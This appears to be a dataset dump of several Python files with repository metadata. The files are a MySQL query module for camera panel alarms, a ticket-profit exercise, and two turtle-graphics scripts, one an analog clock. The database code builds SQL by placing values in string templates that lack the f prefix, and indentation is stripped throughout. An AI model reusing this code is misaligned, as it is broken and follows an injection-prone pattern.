def query_latest_panel(camera_id):
try:
conn = mc.connect(**fs_icv_db)
cursor = conn.cursor(dictionary = True)
query_sql = "SELECT description,panel_result.camera_id,status_type,alarm_data,panel_picture,DATE_FORMAT(time,'%Y-%m-%d %T') AS time,alarm_type FROM camera,panel_result WHERE panel_result.camera_id = '{camera_id}' AND camera.camera_id = panel_result.camera_id ORDER BY time DESC LIMIT 0,1;"
cursor.execute(query_sql)
data = cursor.fetchone()
if not data:
return None
data['alarm_type'] = ",".join(list(data['alarm_type']))
return data
except Exception as e:
print(e)
return None
finally:
cursor.close()
conn.close()
# 获取全部面板结果
def query_panel_history(offset,limit,search):
try:
conn = mc.connect(**fs_icv_db)
cursor = conn.cursor(dictionary = True)
if search == "正常":
query_sql = "SELECT panel_result.camera_id,status_type,alarm_data,panel_picture,description,alarm_type,DATE_FORMAT(time,'%Y-%m-%d %T') AS time FROM camera,panel_result WHERE panel_result.camera_id = camera.camera_id AND panel_result.status_type = '正常' ORDER BY time DESC;"
elif search == "异常":
query_sql = "SELECT panel_result.camera_id,status_type,alarm_data,panel_picture,description,alarm_type,DATE_FORMAT(time,'%Y-%m-%d %T') AS time FROM camera,panel_result WHERE panel_result.camera_id = camera.camera_id AND panel_result.status_type = '异常' ORDER BY time DESC;"
else:
query_sql = "SELECT panel_result.camera_id,status_type,alarm_data,panel_picture,description,alarm_type,DATE_FORMAT(time,'%Y-%m-%d %T') AS time FROM camera,panel_result WHERE panel_result.camera_id = camera.camera_id ORDER BY time DESC;"
cursor.execute(query_sql)
data = cursor.fetchall()
returndata = data[offset:offset+limit]
for single in returndata:
single['alarm_type'] = ",".join(list(single['alarm_type']))
result = {
'total':len(data),
'rows':returndata
}
return result
except Exception as e:
print(e)
return None
finally:
cursor.close()
conn.close()
# 日常拍照时间间隔
def update_panel_interval(interval):
try:
conn = mc.connect(**fs_icv_db)
cursor = conn.cursor(dictionary = True)
query_sql = "SELECT * FROM panel_daily_time;"
cursor.execute(query_sql)
data = cursor.fetchall()
if len(data) == 0:
insert_sql = "INSERT INTO panel_daily_time(time_interval) VALUES('{interval}');"
cursor.execute(insert_sql)
conn.commit()
else:
update_sql = "UPDATE panel_daily_time SET time_interval = '{interval}';"
cursor.execute(update_sql)
conn.commit()
return 'ok'
except Exception as e:
print(e)
return 'wrong'
finally:
cursor.close()
conn.close()
# 查询日常拍照时间间隔
def query_panel_interval():
try:
conn = mc.connect(**fs_icv_db)
cursor = conn.cursor(dictionary = True)
query_sql = "SELECT * FROM panel_daily_time;"
cursor.execute(query_sql)
data = cursor.fetchall()
if len(data) == 0:
data = ''
else:
time_hash = {
"10":"10分钟",
"30":"30分钟",
"60":"1小时",
"120":"2小时",
"180":"3小时"
}
data[0]['time_interval'] = time_hash[data[0]['time_interval']]
return data
except Exception as e:
print(e)
return None
finally:
cursor.close()
conn.close() | [
"xwp_fullstack@163.com"
] | xwp_fullstack@163.com |
a7c4f424709c906decef7ac3409403229846dd1c | c77a40408bc40dc88c466c99ab0f3522e6897b6a | /Programming_basics/Exercise_7/AgencyProfit.py | a3938967800366d45453b1a08b8b42eed96dad4e | [] | no_license | vbukovska/SoftUni | 3fe566d8e9959d390a61a4845381831929f7d6a3 | 9efd0101ae496290313a7d3b9773fd5111c5c9df | refs/heads/main | 2023-03-09T17:47:20.642393 | 2020-12-12T22:14:27 | 2021-02-16T22:14:37 | 328,805,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | name = input()
elder_tickets = int(input())
child_tickets = int(input())
elder_ticket_price = float(input())
fee = float(input())
elder_fin_price = elder_ticket_price + fee
child_fin_price = elder_ticket_price * 0.3 + fee
total = elder_tickets * elder_fin_price + child_tickets * child_fin_price
profit = total * 0.2
print(f'The profit of your agency from {name} tickets is {profit:.2f} lv.')
| [
"vbukovska@yahoo.com"
] | vbukovska@yahoo.com |
1986344b43c648c00039b97711e2dc0504351d08 | 15e4ea46e2b1944add82746c4b3369184550af1b | /4 Turtles/Exercises/12.py | d1f03e57e3a9db7631b7632e03de692aced0d777 | [] | no_license | eduardogomezvidela/Summer-Intro | 53204a61b05066d8b8bc1ef234e83e15f823934d | 649a85b71a7e76eade3665554b03ca65108c648b | refs/heads/master | 2021-04-29T13:34:26.873513 | 2018-02-16T13:35:48 | 2018-02-16T13:35:48 | 121,754,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54 | py | import turtle
alex=turtle.Turtle()
print(type(alex))
| [
"eduardogomezvidela@gmail.com"
] | eduardogomezvidela@gmail.com |
74707c9d2c81498ed5fdb4c8f86098f7a2885d48 | a31de016611f3b4efc7a576e7113cad1a738419b | /2017/turtle_grafik/101computing.net/turtle_clock.py | 807e976a1aea285185ccdd4507415e444013ccf9 | [] | no_license | Ing-Josef-Klotzner/python | 9d4044d632672fff966b28ab80e1ef77763c78f5 | 3913729d7d6e1b7ac72b46db7b06ca0c58c8a608 | refs/heads/master | 2022-12-09T01:40:52.275592 | 2022-12-01T22:46:43 | 2022-12-01T22:46:43 | 189,040,355 | 0 | 0 | null | 2022-12-01T19:52:37 | 2019-05-28T14:05:16 | Python | UTF-8 | Python | false | false | 2,072 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
"""
Created on Mon Sep 25 23:16:54 2017
@author: josef
"""
import turtle, datetime, time
myPen = turtle.Turtle()
myPen.shape("arrow")
myPen.tracer(0)
myPen.speed(0)
myPen.shapesize(.5,1)
turtle.delay(0)
myPen.penup()
myPen.goto(0,-180)
myPen.pendown()
myPen.pensize(3)
myPen.color("blue")
myPen.circle(180)
for wi in range(6,361,6): # 360/60 = 6 -- Sekundenstriche
myPen.penup()
myPen.goto(0,0)
myPen.setheading(wi)
myPen.fd(160)
myPen.pendown()
myPen.fd(10)
myPen.pensize(6)
for wi in range(30,361,30): # 360/60 = 6 -- Minutenstriche
myPen.penup() # bei 3,6,9,12 länger
myPen.goto(0,0)
myPen.setheading(wi)
if wi % 90 == 0:
myPen.fd(155)
myPen.down()
myPen.fd(15)
else:
myPen.fd(160)
myPen.pendown()
myPen.fd(10)
myPen.pensize(3)
while True:
myPen.color("red")
currentSecond = datetime.datetime.now().second
currentMinute = datetime.datetime.now().minute
currentHour = datetime.datetime.now().hour
myPen.penup()
myPen.goto(0,0)
myPen.setheading(90) # Point to the top - 12 o'clock
myPen.right(currentHour*360/12+currentMinute*360/12/60+currentSecond*360/12/60/60)
myPen.pendown()
myPen.pensize(7)
myPen.forward(100)
myPen.stamp()
myPen.penup()
myPen.goto(0,0)
myPen.setheading(90) # Point to the top - 0 minute
myPen.right(currentMinute*360/60+currentSecond*360/60/60)
myPen.pendown()
myPen.pensize(5)
myPen.forward(130)
myPen.stamp()
myPen.color("green")
myPen.penup()
myPen.goto(0,0)
myPen.pensize(7)
myPen.dot()
myPen.pensize(3)
myPen.setheading(90) # Point to the top - 0 minute
myPen.right(currentSecond*360/60)
myPen.pendown()
myPen.forward(140)
myPen.getscreen().update()
time.sleep(.99)
for _ in range(20):
myPen.undo()
# myPen.getscreen().update()
#turtle.done()
| [
"josef.klotzner@gmail.com"
] | josef.klotzner@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.